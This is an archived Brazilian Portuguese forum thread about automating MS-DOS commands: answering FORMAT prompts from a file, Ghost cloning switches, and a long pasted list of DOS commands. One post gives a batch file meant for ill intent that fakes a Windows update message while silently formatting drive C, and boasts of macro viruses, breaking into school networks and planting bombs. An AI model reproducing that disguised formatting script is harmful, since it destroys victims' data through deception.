Ir ao conteúdo
  • Cadastre-se

Revelando Codigos


Matrix 007

Posts recomendados

  • mês depois...
  • 4 meses depois...
  • 5 meses depois...
Postado Originalmente por Leon@rdo@08 de maio de 2003, 23:07

<font color='#000F22'>Que isso, eu que agradeço por ter lido, mas esqueci de colocar alguns outros sites mas ai vão eles:

para monitores - Link monitores

para dispositivos: mouse, keyboard etc - Link dispositivos de entrada

para Impressoras e Ploters -

Link Impressoras e Ploters

para scanners - Link Scanners

para som - Link som

para USB - Link USB

para cameras - Link cameras

para CD-ROM E DVD - Link CD-ROM E DVD

para drivers em geral do Windows XP -  Link Windows XP

para HDs controladoras IDE, SCSI etc -  Link HDs, etc...

então é isso ai, espero ter ajudado com outros links para drivers ok, grato pela atenção.

Leonardo</font>

Link para o comentário
Compartilhar em outros sites

  • 2 meses depois...
  • 3 semanas depois...

Agora me bateu uma dúvida. parece que eu chegeui um pouco atrasado.

eu uso um disquete de boot com o ghost para clonar hd's, com o autoexec.bat eu consigo fazer executar o ghost logo de dá boot (moleza), mas eu quero que o programa dê enter depois de ligar para começar a clonar sem eu ter que escolher as opções.

eu tentei gravar um arquivo .txt escrito enter, mas já suspeitava que não iria conseguir.

Alguem pode me ajudar nisso?

Link para o comentário
Compartilhar em outros sites

  • mês depois...

:bandeira: OK! gostei das Opções aqui escritas!

Mas vocês já tentaram essa:

- Crie um arquivo no NOTEPAD e Salve-o no C: com o nome de Enter."sem extensão".

- No arquivo Enter.* criado no NOTEPAD deve conter um Enter(não escrito mas feito com a tecla Enter).

- Pronto agora você tem uma tecla Enter feita em arquivo. agora é só usar para finalizar os programas como:

Crie um arquivo de LOTE contendo:

@echo off

format (unidade desejada:)/Q < C:\Enter

S < C:\Enter

Link para o comentário
Compartilhar em outros sites

Ate que fim o pessoal entendeu a importancia desse comando!!

Ta certo que eu não tenho muito tempo de ficar respondendo o que o pessoal me pergunta, mas acho que o topico chegou onde deveria estar.

Estou fazendo um estudo de como testar processadores e assim que eu acabar vou postar no forun pra evitar de ter que perder uma placa-mãe com um processador duvidoso. Valeu a todos!!!!

Link para o comentário
Compartilhar em outros sites

bom dia ....

metendo a colher na conversa .... podem simplesmente usar o comando :

format [unidade] /u/autotest /q

onde :

unidade e a letra do disco que quer formatar

/autotest - não pergunta por S ou N e manda a formatação

/q se quiser uma formatação rapida

/u inicia formatação incondicional

exemplo : FORMAT A:/u/autotest

Link para o comentário
Compartilhar em outros sites

  • mês depois...
  • 2 meses depois...
Postado Originalmente por Tanato@11 de agosto de 2005, 11:50

Agora me bateu uma dúvida. parece que eu chegeui um pouco atrasado.

eu uso um disquete de boot com o ghost para clonar hd's, com o autoexec.bat eu consigo fazer executar o ghost logo de dá boot (moleza), mas eu quero que o programa dê enter depois de ligar para começar a clonar sem eu ter que escolher as opções.

eu tentei gravar um arquivo .txt escrito enter, mas já suspeitava que não iria conseguir.

Alguem pode me ajudar nisso?

ai vai a automatização do ghost :

Ghostpe -z9 -bfc -crcignore -fro -auto -rb -quiet -clone,MODE=pdump,SRC=1:1,DST=d:\WIN98\backup.gho

( tudo como esta escrito na mesma linha ...

no caso acima eu clono a partição c:\ ( SRC=1:1 ) do meu hd para a partição d:\ ( DST=d:\WIN98\backup.gho ) do mesmo hd ..... como trabalho num local com muitas maquinas e varios usuarios que não tomam o minimo cuidado com virus e afins ..... deu pau no drive c eu vou la e restauro a imagem em minutos .... ps.: da pra automatizar a restauração tambem .....ai e so usar a criatividade ......

qualquer coisa me informe .... pode ser por e-mail se quiserem

post-46194-13884904970828_thumb.jpg

Link para o comentário
Compartilhar em outros sites

  • 2 meses depois...

poxa galera eu faço isso de modo mais fácil , editando o aquivo auto exc.bat do disco de boot e so colocar na ultima linha o comado que você quer e salvar as alteraçoes!!!!

pra quen não sabe editar click com mouse2(botao direito) no arquivo va em editar e abrira o editor desse arquivo.

por exemplo :editem nesse arquivo , la na ultima linha escreva : scandisk c , depois feche , salve e reinicie o sistema com o disco no drive pra vocês verem !!!!

eu queria saber o parametro para enter ???

Link para o comentário
Compartilhar em outros sites

  • 6 meses depois...

buff ate parece que quem postou isso me conhece, eu tinha feito algo muito parece ha muito tempo, eu era muito viciado em DOS e fazia varios programinhas em .BAT

agora a maioria dos codigos q o carinha postou não funciona corretamente, primeiro porque você não precisa usar arquivo no caso de formatacao com a opcao /Q, olha faz anos q eu não utilizo DOS, mas pelo que eu me lembre é o seguinte:

exemplo: c:\format c: /q /u

vai formatar direto

agora se voce quer um formatacao bonita e completa, tem q usar o esquema de arquivo, so q os exemplos usados aqui estão mais ou menos errado, porque quando você faz isso, o format pergunta se voce quer formatar e depois de formatado se voce quer formatar outra unidade.

na epoca q eu fiz isso, era assim, um arquivo tipo:

"sim.txt"

contendo as seguintes informações na seguinte ordem:

S<aperta ENTER>

N<aperta ENTER>

<aperta ENTER>

e salvar o arquivo.

depois você faz o seguinte:

C:\>format c: < sim.txt > nul

ou um arquivo .bat caso você esteja mau intencionado

@echo off

echo "Aguarde enquanto o windows atualiza o seu sistema"

C:\>format c: < sim.txt > nul

isso era bem eficaz nos tempos de windows 98 eu cheguei a fazer varios virus de macros pro word q contamina outros arquivos words e ao mesmo tempo adiconar um arquivo bat dentro do autoexec.bat q chamava meu virus .bat que contava "20 boots" e depois formatava o pc, na epoca eu estudava pra ser "hacker" sabia varias linguagens, mas cabei desistindo toma muito o tempo, tem q ficar muito tempo no pc e eu sou um cara q gosta de varias coisas diferentes e de muito esporte, num da pra fazer tudo junto.

lol nessa epoca eu era muito destruidor, principalmente na escola eu era estão ruim q mandava esses meus macros pross meus "amigos".

o engracado q nessa epoca do colegio eu nem ficava muito com os nerds, ficava jogando bola e fazendo outras coias no recreio e os caras que sacavam muito de PC estavam na equipe de basket e volei, so q ninguém sabia q cada um sacava de pc, porque ninguém falava sobre isso, depois de muito tempo é q surgiu um comversa sobre PC e acabamos descubrindo q agente tinha essa coisa em comum, muito estranho, tb tinha um ou 2 nerds que sacavam bem, era muito show invadir os pc do colegio usando do proprio laboratorio pra invadir outras redes para ter acesso as provas :) fiz muito isso na faculdade "Castelo Branco" do RJ, se tem alguem aqui do RJ e estudou no CB deve ate me conhecer ou ouvido falar de mim eu tb era meio terrorista colocando bomba nos banheiros etc,, uma vez saiu ate no RJ tv. :o

hoje em dia mais maduro não faco mais isso hehe.

Link para o comentário
Compartilhar em outros sites

  • 5 meses depois...
  • 8 meses depois...

E aí galera ?

Isso que ele disse funciona sim , você pode usar isso em seus *.BAT para deixar que comandos externos do MS-DOS fiquem totalmente invisiveis para o usuario , mas é necessario que você saiba todas as entradas que o programa ou comando interno requeiram, e o nome que você vai dar ao arquivo não importa ele deve estar no mesmo diretorio ou você pode especificar o caminho na linha de comando .

Use o circunflexo (^) para quebra de linha .

No momento não posso dar um exemplo pois estou trabalhando .

Mas isso funciona sim.

Link para o comentário
Compartilhar em outros sites

  • 2 meses depois...
  • 4 meses depois...

COMANDOS DO MS-DOS

Os nomes dos diretórios são com no máximo 8 caracteres, sempre precedidos de uma barra invertida para a esquerda. O diretório principal échamado de raiz, os outros são sub-diretórios. O prompt do sistema é (c:>-). O comando prompt se altera até que se desligue o computador ou de execute um novo comando.

Parâmetros do prompt

SP- mostra a localização corrente.

SG- mostra o sinal(>), para achar o diretório corrente digite (prompt spsg) e tecle enter.

CLS- limpa a tela

DIR- fornece alista de arquivos. EX. estando em c:\>, digite DIR e enter.

Parâmetros de DIR (DIR/P, /O, /W, /B, /L). Para saber somente informações de um arquivo digite DIR e o nome do arquivo, caso deseje listar um arquivo e não sabe onde ele está, adicione (/S) EX. DIR COMAND. COM/S

DOSKEY- repete o último comando digitado, use as setas do teclado.

CD- nos leva para dentro de um diretório, estando no dir. raiz (c:\>) e quer entrar no dir. PESSOAL, digite CD\PESSOAL e de enter.

CD.. para retornar a um dir. EX. C:\> você está aqui

MD- cria novos diretórios, EX. você está na raiz do msdos (c:\>) e qu

er criar um diretório chamado temp, digite: md temp e de enter. Para entrar no dir. que criou, digite: cd temp e de enter.

RD- só remove diretórios vazios (sem arquivos) EX. no dir. raiz digite RD e o nome do dir. depois de enter.

Para apagar o arquivo de um dir. use o comando DEL, o arq. Test. Bak está no dir. TEMP, vamos apagá-lo, digite: del c:\temp\test. bak e de enter.

Para apagar mais de um arq. Digite: DEL C:\TEMP\*.*

PATH- alterna o caminho para programas em outro dir., vamos supor que você está na raiz do msdos(c:\>) e quer entrar em um programa que esteja no dos, faça o seguinte: entre no dos (CD DOS ) e execute o programa, ou na raiz digite: path c:\nome do dir. e de enter, para ter certeza que colocou o dir. no path, digite path e de enter.

COPY- copia arquivos de um disco para dir. de outro disco, ou seja: ( de C para A ) EX. para copiar o arquivo test. Txt que está no dir pessoal do disco C para o dir. trans do disco A digite: copy c:\pessoal\test.txt a:\trans e de enter.

Parâmetros de copy-

Copy*.exe- copia todos os arq. Exe,

Copy cliente.* - copia todos os arq. Cliente. *.* ( vale dizer todos os arq. )

Para IMPRIMIR adicione o parâmetro PRN

Para imprimir de um disquete digite: copy a:\test. doc prn e de enter ( ligue impressora)

XCOPY- copia um dir. inteiro de um disco para outro, digite: ( xcopy c:\útil a:\ )

DELTREE- exclui um dir. inteiro, EX. digite: deltree c:\útil e de enter.

UNDELETE- tenta recuperar arq. Apagados pelo comando DEL, obs. não recupera dir. ou arq. de dir. removidos. Suponhamos que você por engano apagou o arq. autoexec. Bat , digite undelete e de enter.

Link para o comentário
Compartilhar em outros sites

CONTINUAÇÃO DE COMANDOS DO MS-DOS

TREE- mostra todos os dir. do disco especificado. Para ver todos os dir. do disco C você tem que está na raiz do dos ( c:\> ) e digitar tree depois enter.

Parâmetros de tree: ( tree/f e tree/a ).

RENAME ou REN- renomeia um arq. EX. para renomear test. txt para texto 1. Tex digite: (ren test. txt texto1. tex ). Pode-se usar também * para mudar a extensão txt para tex em todos os arq.

EX. ren*.txt*. tex

TYPE- examina arq. tipo texto, se o arq. for maior que a tela use as teclas: ctrl+s e ctrl num lock.(digite type e o nome do arq. )

ATTRIB- protege os arquivos contra alterações ( opções ) attrib +ou – ( R ou H )( + ativa) (- desativa )

EDIT- editor de texto, é preciso executar o arq. edit. Exe encontrado no dir. c:\dos ( na tela do edit use as teclas alt, enter e setas do teclado.

DEFRAG- para utilizar digite defrag. exe

SKANDISK- é só digitar e apertar enter, escolha sempre a opção salvar, para ver um arq. CHK use MORE, para apagar os arq. que não quer use del.

CHKDSK- checa informações de um disco especificado. ( /F corrigi erros ) ( /V relaciona os arq. )

FORMAT- todo disco novo ou usado antes de ser utilizado tem que ser formatado. EX.( format a: ou format c:). Opções do format: /u apaga os dados do disco, /s inclui os arq. do sistema fazendo assim um disco de boot.

gera uma cópia de segurança do disco rígido para um disquete na forma compactada.

EX. (c:\>backup c:/útil a:/s ), copia todos os sub-diretórios começando pelo caminho especificado.

Para utilizar os arq. copiados é preciso restaurá-los, EX. digite restore a: c:/s e de enter.

BACKUP- MORE- conteúdo de um arquivo. EX. dir | more.

FDISK- particiona o disco rígido

LABEL- altera o nome do volume do disco ( flexível | rígido )

VOL- informa o nome do volume do disco

VER- informa a versão do DOS.

ARJ X -Y descompactar arquivo arjeado

Link para o comentário
Compartilhar em outros sites

Lista de comandos do MS-DOS:D;)^_^

(Redirecionado de Lista de comandos do MS-DOS)

Abaixo segue uma lista de comandos do sistema operacional MS-DOS da Microsoft. Para obter ajuda na utilização de um comando, digite /? logo após o nome do comando, na tela do MS-DOS.

Exemplo:

C:\> <comando> /?

Ao invés de ser executado, o MS-DOS retornará uma página de ajuda do comando escolhido (com a definição, opções disponíveis e talvez alguma observação). A lista abaixo apresenta informações semelhantes (definição e analogia com comandos do Unix e/ou Linux, sintaxe, opções e exemplo).

Uso:

No prompt do MS-DOS digita-se:

C:\> <comando> <ENTER>

No prompt de comando ainda pode ser utilizado uma seqüencia

de commandos na mesma linha utilizando o caracter "|" (pipe),

permitindo a inserção de múltiplos comandos em uma única linha.

Exemplo:

C:\> <comando> | <2º comando> | <3º comando> etc... <ENTER>

Índice [esconder]

1 ATTRIB

2 CALL

3 CHDIR

4 CLS

5 COMP

6 COPY

7 DATE

8 DELTREE

9 DIR

10 DISKCOMP

11 DISKCOPY

12 ECHO

13 FIND

14 FOR

15 FORMAT

16 IF

17 LABEL

18 MKDIR

19 MEM

20 MODE

21 MORE

22 MOVE

23 PATH

24 PAUSE

25 PROMPT

26 RENAME

27 RMDIR

28 TREE

29 TIME

30 TITLE

31 TYPE

32 VER

33 EDIT

34 EXIT

35 WIN

36 FDISK

[editar] ATTRIB

Ver artigo principal: Attrib

Na linha de comando do sistema operacional MS-DOS, o comando ATTRIB é usado para mostrar os atributos dos arquivos e diretórios (somente leitura, arquivo do sistema, arquivo morto e oculto), e permite alterá-los.

Nota: sua função é análoga ao comando chmod do Unix e chattr do Linux.

Sintaxe

C:\> ATTRIB <opções> <unidade> <caminho> <arquivo>

Opções

+ : Acrescenta um atributo

- : Retira um atributo

R : Atributo somente leitura

A : Atributo de arquivo morto

S : Atributo de arquivo do sistema

H : Atributo de arquivo oculto

/s : Inclui todos os arquivos do diretório definido e todos os seus subdiretórios

/d : Inclui diretórios no processamento (necessita da opção /s).

Exemplo

C:\>ATTRIB +R C:\EXEMPLO.TXT''' '''

C:\>ATTRIB -R /D /S N:\*.*

[editar] CALL

Usado para chamar (executar) um programa, comando ou script DOS (arquivo de lote ou arquivo .bat)

Sintaxe

CALL script <enter>

Opções

Exemplo

C:\>CALL C:\TESTE.BAT

[editar] CHDIR

CHDIR (pode ser abreviado para CD) é usado para trocar o diretório corrente ou acessar um subdiretorio.

Sintaxe

CHDIR diretorio <enter>

Opções

CHDIR C:\WINDOWS\Desktop\Exemplo

[editar] CLS

Na linha de comando do sistema operacional MS-DOS, o comando CLS é usado para apagar todas as informações mostradas na tela, e coloca o cursor no canto superior esquerdo.

Nota: sua função é análoga ao comando clear do Unix.

Sintaxe

CLS <enter>

C:\>CLS

[editar] COMP

COMP compara dois arquivos

Sintaxe

COMP Arquivo1 Arquivo2 <opções> <enter>

Opções

/D Saída em hexadecimal

/A Saída ASCII

/L Mostra o número das linhas que são diferentes

/C Não faz distinção entre caracteres maiúsculos e minúsculos

Exemplo

[editar] COPY

Usado para copiar um ou mais arquivos de um diretório para outro.

Nota: sua função é análoga ao comando cp do Linux

Sintaxe

COPY c:\windows\*.* c:\windows\desktop /V

/V Verifica a integridade do arquivo destino após a cópia

; Exemplo

<pre>

C:\>COPY D:\EXEMPLO\ARQUIVO.TXT E:\PASTA

Dica

Para copiar todo o conteúdo de uma pasta, use *.*

COPY C:\*.* E:\PASTA >> Copia todo o conteúdo em C:\ para E:\PASTA

Exemplo

COPY C:\*.* E:\PASTA

[editar] DATE

Na linha de comando do sistema operacional MS-DOS, o comando DATE é usado para mostrar a data atual do sistema, podendo ser atualizada. Ao digitar uma nova data, pode ser usado como caractere separador o hífen, a barra ou o ponto (dd-mm-aaaa, dd/mm/aaaa ou dd.mm.aaaa).

Nota: sua função é análoga ao comando date do Unix.

Sintaxe

DATE <opções>

Opções

/t : Mostra a data sem permitir alterá-la.

Exemplo

C:\>DATE

Data atual: ter 20/01/1999

Digite a nova data: (dd-mm-aa) 06/01/2000

[editar] DELTREE

Na linha de comando do sistema operacional MS-DOS, o comando DELTREE é usado para apagar um ou mais diretórios junto com todos os seus subdiretórios e arquivos neles contidos. Não é mais usado desde o Windows 2000, devido aos danos ocasionados por usuários inexperientes ou mal-intencionados.

Sintaxe

C:\>DELTREE <opções> <unidade> <caminho>

Opções

/y : Exclui o caminho indicado sem pedir confirmação.

Exemplo

C:\>DELTREE A:\EXEMPLO

[editar] DIR

Na linha de comando do sistema operacional MS-DOS, o comando DIR é usado para listar arquivos e diretórios.

Nota: sua função é análoga ao comando ls do Unix.

Ele existe desde a primeira versão do MS-DOS e está embutido no interpretador de comandos deste sistema operativo, ao contrário do ls que é por si só um programa.

Sintaxe

DIR <opções> <unidade> <diretório>

Opções

Algumas implementações do MS-DOS dispõe de mais opções, estas são apenas as mais comuns.

/A[xx] : Lista os arquivos com alguns atributos específicos

/B : Lista apenas o nome dos arquivos

/L : Nome dos arquivos em letras minúsculas

/O[xx] : Modifica a ordenação da lista

/P : Pausa a cada página

/S : Lista também os subdiretórios (Use dir/s + nome do arquivo para procurar um aquivo específico em todo HD, pelo prompt do MS-DOS. Equivale a tecla F3 no Windows Explorer)

/W : Formato de lista amplo

/? : Help, exibe as opções que podem ser utilizadas no DIR

Exemplo

Este exemplo foi tirado em uma implementação de interpretador de comandos do Windows 2000.

C:\>DIR

Volume in drive C is MAIN W2K

Volume Serial Number is 2326-30E6

Directory of C:\

11/17/2001 09:40p 257,787 INF000.SWP

04/16/2002 10:12p 446 VIRUSLOG.TXT

05/19/2002 04:34p <DIR> filelib

11/22/2001 05:17p 228 BOOT.BAD

11/22/2001 05:10p 1,663 MSDOS.BAD

12/09/2001 09:07a 8,681 SCANDISK.LOG

11/22/2001 05:40p 1,775 MSDOS.SYS

01/03/2002 12:05a <DIR> eBooks

11/22/2001 04:59p 185 BOOT.w98

11/22/2001 05:12p 253 BOOT.w2k

03/08/2002 02:08p <DIR> WINNT

11/22/2001 02:17p <DIR> Games

11/17/2001 10:04p <DIR> Documents and Settings

05/12/2002 05:57p <DIR> dostemp

10/14/2001 09:51a <DIR> Downloads

08/01/2002 07:15p 160 AUTOEXEC.BAT

12/09/2001 05:24p <DIR> Backup

10/14/2001 09:25a <DIR> MSDOS7

09/30/2002 03:48p <DIR> cygwin

11/25/2002 03:02a <DIR> My Documents

03/08/2002 02:45p <DIR> Program Files

03/31/2002 07:41p <DIR> Temp

9 File(s) 2,674,060 bytes

16 Dir(s) 2,672,476,160 bytes free

--------------------------------------------------------------------------------

Uma das funcionalidades práticas do DIR é exibir o resultado da pesquisa em um arquivo de texto, e não apenas na tela do monitor, podendo inclusive ser utilizada toda e qualquer opção disponível.

Para tanto, basta utilizar o comando: DIR [opções] [unidade] [diretório] >[unidade][nome do arquivo .txt].

Exemplo:

C:\Documentos>dir /s /w >C:\lista.txt

[editar] DISKCOMP

DISKCOMP compara dois disquetes.

Sintaxe

DISKCOMP Unidade1 Unidade2 <enter>

Opções

Exemplo

DISKCOMP A: B:

[editar] DISKCOPY

DISKCOPY copia um disquete. Não pode ser usado para copiar o pum(HD)

Sintaxe

DISKCOPY Origem Destino <enter>

Opções

Exemplo

[editar] ECHO

Envia, ou controla o envio, de mensagens para a saída padrão. Usado em scripts DOS para controlar as mensagens enviadas para a saída padrão (monitor, tela ou ecrã).

Nota: sua função é análoga ao comando echo do Linux.

Sintaxe

ECHO [ON] [OFF] [mensagem] <enter>

Opções

ON : Ativa a saída dos comandos para a saída padrão.

OFF : Desativa a saída dos comandos para a saída padrão.

Exemplo

[editar] FIND

Procura uma cadeia de caracteres numa lista de arquivos.

Sintaxe

FIND <opções> ''Texto'' arquivos

Opções

/C : Conta as ocorrencias

/I : Ignora diferença entre maiúsculas e minúsculas.

/N : Número das linhas em que Texto aparece.

/V : Mostra apenas linhas que contém Texto

Exemplo

(FIND /I "sequencia" C:\WINDOWS\explorer.exe) o parametro "sequencia" faz parte da linha, caso não colocar a sintaxe nao funcionara

(FIND /I "TESTE" C:\demosnstrando.txt) (FIND /I "palavra" *.txt | sort > pesquisa.txt) Neste caso ele vai pesquisar no diretorio corrente todos os arquivos(txt) e guardar o resultado no arquivo pesquisa.txt.

[editar] FOR

Usado para repetir comandos

Sintaxe

FOR %%Variavel IN ( ''lista'' ) DO ''Comando''

Opções

Exemplo

FOR %%A IN ( texto1 texto2 texto3) DO ECHO %%A

[editar] FORMAT

Na linha de comando do sistema operacional MS-DOS, o comando FORMAT é usado para formatar um disco, preparando-o para receber dados.

Nota: sua função é análoga ao comando mkfs do Unix.

Sintaxe

FORMAT <unidade> <opções>

Opções

/s : Formata o disco na unidade especificada e grava o sistema operacional MS-DOS em seguida.

/4 : Formata um disquete de baixa densidade em drives de alta densidade.

/q : Formata rapidamente o disco da unidade especificada (formatação rápida).

/u : Formata o disco na unidade especificada independente da condição.

Exemplo

C:\>FORMAT A:

[editar] IF

Executa Comando se Condição for verdadeira

Sintaxe

IF Condição Comando else outro comando

Opções

Exemplo

[editar] LABEL

Usado para renomear uma unidade: LABEL (Unidade) (nome desejado)

[editar] MKDIR

MKDIR, ou abreviado MD, cria um subdiretório.

Sintaxe

MKDIR subdiretório

Opções

Exemplo

C:\>MKDIR /diretorio1

C:\>MKDIR /diretorio1/diretorio2

[editar] MEM

Na linha de comando do sistema operacional MS-DOS, o comando MEM é usado para mostrar informações sobre o uso da memória RAM.

Sintaxe

MEM <opções>

Opções

/p : Mostra o status dos programas que estão usando a memória.

/d : Mostra vários dados sobre o uso da memória pelos programas.

/c : Mostra o tamanho dos programas e os classifica de acordo com o uso da memória.

Exemplo

C:\>MEM

655360 bytes de memória convencional

655360 bytes disponíveis para o MS-DOS

626592 tamanho do maior programa executável

1048576 bytes de memória estendida contígua

0 bytes disponíveis de memória estendida contígua

941056 bytes de memória XMS disponível

MS-DOS está residente na área de memória alta

[editar] MODE

Configura a tela e a porta serial.

Sintaxe

MODE COM1:2400,N,8,1,P

MODE LPT1:=COM1

MODE LPT1

MODE N

Opções

Exemplo

MODE 120 -> aumenta a tela do prompt do comando para 120 colunas.

[editar] MORE

Permite exibir 23 linhas de texto, da entrada padrão na saida padrão, e aguardar o pressionamento de uma tecla. Tanto a entrada padrão quanto a saida padrão podem ser redirecionadas

Sintaxe

MORE arquivo

Opções

Exemplo

DIR | MORE

[editar] MOVE

Move os arquivos de um diretório para outro.

Nota: sua função é análoga ao comando mv do Linux.

Sintaxe

Sintaxe: MOVE [unidade:] [caminho] [nome antigo] [nome novo] ou [Origem] [Destino]

Opções

Exemplo

C:\>MOVE C:AULA C:TESTE , renomeia o diretório C:AULA para C:TESTE

C:\>MOVE C:AULA*.* A: , faz a movimentação de todos os arquivos do drive de origem C:AULA para o drive de destino A: deixando assim o diretório C:AULA vazio.

[editar] PATH

Define os diretórios em que se encontram arquivos executáveis.

Nota: sua função é análoga ao comando path do Linux.

Sintaxe

PATH Diretório1;Diretório2

Opções

Diretório2, e outros, são opcionais.

Exemplo

[editar] PAUSE

Aguarda o pressionamento de uma tecla.

Sintaxe

PAUSE Mensagem

Opções

Mensagem é opcional

[editar] PROMPT

Altera o aviso da linha de comandos do DOS.

Sintaxe

PROMPT [texto]

Opções

PROMPT [texto]

texto Especifica um novo prompt.

O prompt é composto de caracteres normais e dos seguintes códigos especiais:

$Q = (sinal de igual)

$$ $ (cifrão)

$T Hora atual

$D Data atual

$P Unidade e caminho atuais

$V Versão do Windows

$N Unidade atual

$G > (sinal de maior)

$L < (sinal de menor)

$B | (símbolo de pipe)

$H Backspace (apaga o caractere anterior)

$E Código de escape (código ASCII 27)

$_ Retorno de carro e avanço de linha

Digite PROMPT com texto livre e o prompt se tornará o texto.

Sintaxe

PROMPT $P$G ==> Retorna em prompt do windows ==> C:\> _ PROMPT $N$Q$G ==> Retorna em prompt do windows ==> C=> _ PROMPT MSVIECK ==> Retorna em prompt do windows ==> MSVIECK _ PROMPT $P$G é o padrão.

[editar] RENAME

Altera o nome de um arquivo. Pode ser abreviado para REN

Sintaxe

REN Antigo Novo

Opções

caracteres curingas * e ?

Exemplo

C:\> REN EX.DOC Exemplo.DOC - muda o nome do arquivo EX.DOC para Exemplo.DOC

C:\> REN *.JPG *.BMP - muda a extensão dos arquivos em .JPG para .BMP

[editar] RMDIR

Na linha de comando do sistema operacional MS-DOS, o comando RMDIR, ou abreviadamente RD, é usado para apagar um diretório.

Nota: sua função é análoga ao comando rmdir do Unix.

Sintaxe

RD <opções> <unidade> <caminho>

Opções

/s : Exclui todos os diretórios e arquivos neles contidos além do próprio diretório informado.

/q : Exclui sem pedir confirmação (usando ou não a opção /s).

Exemplo

C:\>RD C:\EXEMPLO

[editar] TREE

Exibe de forma gráfica a estrutura de pastas de uma unidade ou caminho.

Sintaxe

TREE [unidade:][caminho]

Opções

/F - Exibir os nomes dos arquivos de cada pasta. /A - Usar ASCII em vez de caracteres estendidos.

Exemplo

TREE C:\WINDOWS

[editar] TIME

Na linha de comando do sistema operacional MS-DOS, o comando TIME é usado para mostrar a hora atual do sistema, podendo ser atualizada.

Nota: sua função é análoga ao comando date do Linux.

Sintaxe

TIME <opções>

Opções

/t : Mostra a hora sem permitir alterá-la.

Exemplo

C:\>TIME

Hora atual: 23:15:08,73

Digite a nova hora: 20:06:01,30

[editar] TITLE

Na linha de comando do sistema operacional MS-DOS, o comando TITLE seguido de DOS iria mostrar o título da janela: "DOS"

Sintaxe

TITLE (texto de título a janela) <opções>

Opções

???

Exemplo

Exemplo não disponível, para testes em Microsoft Windows vá no Start/Menu Iniciar>Executar: digite cmd, quando o prompt estiver aberto digite: TITLE jjj e veja o título da janela!

[editar] TYPE

Ele exibe arquivos de textos atraves do prompt de comando.

Nota: sua função é análoga ao comando cat do Linux.

Sintaxe

type [unidade:][caminho]nome do arquivo

Opções

Exemplo

C:\windows\directx.txt ou

C:\texto.txt

[editar] VER

Na linha de comando do sistema operacional MS-DOS, o comando VER é usado para mostrar a versão do sistema operacional em uso.

Nota: sua função é análoga ao comando uname do Unix.

Sintaxe

VER

Opções

Sem opções para o comando VER.

Exemplo

C:\>ver Windows 98 [Versão 4.10.2222] C:\>

ou C:\>ver Windows XP [Versão 6.46] C:\>

[editar] EDIT

Na linha de comandos do sistema operacional MS-DOS, é usado para abrir o editor de texto. Nele, podemos salvar arquivos em várias extensões; como por exemplo, em .bat Esse é um teste padrão.

[editar] EXIT

Este comando é usado somente no prompt do DOS em ambiente Windows, para fechar o pront, não sendo válido para usar em ambiente DOS.

[editar] WIN

Inicia o Windows nas versões 1.x, 2.x, e 3.x. Como o Windows era apenas uma interface grafica na época e somente o DOS era considerado sistema operacional, tinha que se digitar WIN pelo DOS para iniciar o Windows.

[editar] FDISK

Na linha de comandos do MS-DOS, o comando fdisk exibe o menu para criar, ativar, deletar e exibir partições. OBS.: Este comando foi removido desde o Windows XP.

Obtido em "http://pt.wikipedia.org/wiki/Anexo:Lista_de_comandos_do_MS-DOS"

Link para o comentário
Compartilhar em outros sites

  • mês depois...

ei gente eu novo aqui

eu to pedindo pra vocês se vocês tem algum emulador para mim treinar

instalando o windows 98 pelo ms-dos

estou um curso de manutenção de micro

e tem uma prova que o professor esta mandando fazer

a instalação do windows 98

e eu nao quero apagar minhas coisas do meu pc

se me puderem me ajudar valeu

:D

Link para o comentário
Compartilhar em outros sites

  • 4 semanas depois...
  • mês depois...
  • 4 meses depois...

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×
×
  • Criar novo...